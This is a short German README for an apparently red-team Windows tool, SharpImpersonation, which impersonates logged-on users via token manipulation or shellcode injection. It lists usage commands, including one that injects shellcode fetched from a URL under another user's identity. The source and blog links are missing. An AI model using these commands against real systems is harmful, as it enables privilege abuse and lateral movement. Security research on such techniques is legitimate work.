
Ein Benutzer-Impersonationstool – mittels Token- oder Shellcode-Injektion
Dies war ein Learning-by-Doing-Projekt von mir. Es werden bekannte Techniken verwendet, um nur ein weiteres Impersonation-Tool mit einigen Verbesserungen im Vergleich zu anderen öffentlichen Tools zu erstellen. Der Code stammt von:
Ein Blogbeitrag zur Einführung findet sich hier:
PS > PS C:\temp> SharpImpersonation.exe list
PS > PS C:\temp> SharpImpersonation.exe list elevated
PS > PS C:\temp> SharpImpersonation.exe user:<Benutzer> binary:<Binärdatei-Pfad>
PS > PS C:\temp> SharpImpersonation.exe user:<Benutzer> shellcode:<base64shellcode>
PS > PS C:\temp> SharpImpersonation.exe user:<Benutzer> shellcode:<URL>
PS > PS C:\temp> SharpImpersonation.exe user:<Benutzer> technique:ImpersonateLoggedOnuser
